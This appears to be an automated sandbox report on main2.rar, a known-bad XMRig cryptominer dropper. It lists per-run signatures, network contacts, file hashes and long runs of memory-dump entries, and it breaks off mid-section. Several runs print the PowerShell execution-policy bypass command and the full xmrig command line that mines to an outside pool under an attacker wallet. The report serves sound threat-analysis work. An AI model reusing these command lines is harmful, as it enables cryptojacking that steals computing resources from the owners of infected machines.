Malware Analysis Report

2025-04-19 15:52

Sample ID 240522-ytyzraee81
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
xmrig execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 20:05

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 74.239.69.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4896-0-0x00007FFEA40A3000-0x00007FFEA40A4000-memory.dmp

memory/4896-5-0x0000020F7C4F0000-0x0000020F7C512000-memory.dmp

memory/4896-8-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/4896-10-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/4896-9-0x0000020F7C7B0000-0x0000020F7C826000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d3mnrk4e.qcu.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4896-25-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/4896-29-0x00007FFEA40A3000-0x00007FFEA40A4000-memory.dmp

memory/4896-30-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/4896-31-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/4896-32-0x00007FFEA40A0000-0x00007FFEA4A8C000-memory.dmp

memory/4896-65-0x0000020F7C590000-0x0000020F7C59A000-memory.dmp

memory/4896-52-0x0000020F7C950000-0x0000020F7C962000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1048-94-0x000002B911720000-0x000002B911740000-memory.dmp

memory/1048-95-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-96-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-97-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-98-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-99-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-100-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-101-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-102-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-103-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-104-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-105-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-106-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-107-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-108-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-109-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-110-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-111-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-112-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-113-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-114-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-115-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-116-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-117-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-118-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-119-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-120-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-121-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-122-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-123-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-124-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-125-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-126-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-127-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-128-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-129-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-130-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-131-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-132-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-133-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-134-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-135-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-136-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-137-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-138-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-139-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-140-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-141-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-142-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-143-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-144-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-145-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-146-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-147-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-148-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-149-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-150-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-151-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-152-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-153-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-154-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-155-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-156-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

memory/1048-157-0x00007FF7F5420000-0x00007FF7F6053000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win11-20240426-en

Max time kernel

1791s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp

Files

memory/2284-0-0x00007FFAFD413000-0x00007FFAFD415000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_400mirsq.2al.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2284-9-0x0000022672E80000-0x0000022672EA2000-memory.dmp

memory/2284-10-0x00007FFAFD410000-0x00007FFAFDED2000-memory.dmp

memory/2284-11-0x00007FFAFD410000-0x00007FFAFDED2000-memory.dmp

memory/2284-12-0x00007FFAFD410000-0x00007FFAFDED2000-memory.dmp

memory/2284-13-0x00007FFAFD413000-0x00007FFAFD415000-memory.dmp

memory/2284-14-0x00007FFAFD410000-0x00007FFAFDED2000-memory.dmp

memory/2284-15-0x00007FFAFD410000-0x00007FFAFDED2000-memory.dmp

memory/2284-16-0x00007FFAFD410000-0x00007FFAFDED2000-memory.dmp

memory/2284-18-0x0000022673000000-0x0000022673012000-memory.dmp

memory/2284-19-0x0000022672E60000-0x0000022672E6A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3148-50-0x000001C1E07E0000-0x000001C1E0800000-memory.dmp

memory/3148-51-0x000001C1E1F50000-0x000001C1E1F70000-memory.dmp

memory/3148-52-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-54-0x000001C1E1F70000-0x000001C1E1F90000-memory.dmp

memory/3148-55-0x000001C1E1F90000-0x000001C1E1FB0000-memory.dmp

memory/3148-53-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-56-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-57-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-59-0x000001C1E1F90000-0x000001C1E1FB0000-memory.dmp

memory/3148-58-0x000001C1E1F70000-0x000001C1E1F90000-memory.dmp

memory/3148-60-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-61-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-62-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-63-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-64-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-65-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-66-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-67-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-68-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-69-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-70-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-71-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-72-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-73-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-74-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-75-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-76-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-77-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-78-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-79-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-80-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-81-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-82-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-83-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-84-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-85-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-86-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-87-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-88-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-89-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-90-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-91-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-92-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-93-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-94-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-95-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-96-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-97-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-98-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-99-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-100-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-101-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-102-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-103-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-104-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-105-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-106-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-107-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-108-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-109-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-110-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-111-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-112-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-113-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-114-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-115-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-116-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-117-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

memory/3148-118-0x00007FF6C7AB0000-0x00007FF6C86E3000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:36

Platform

win10-20240404-en

Max time kernel

1792s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

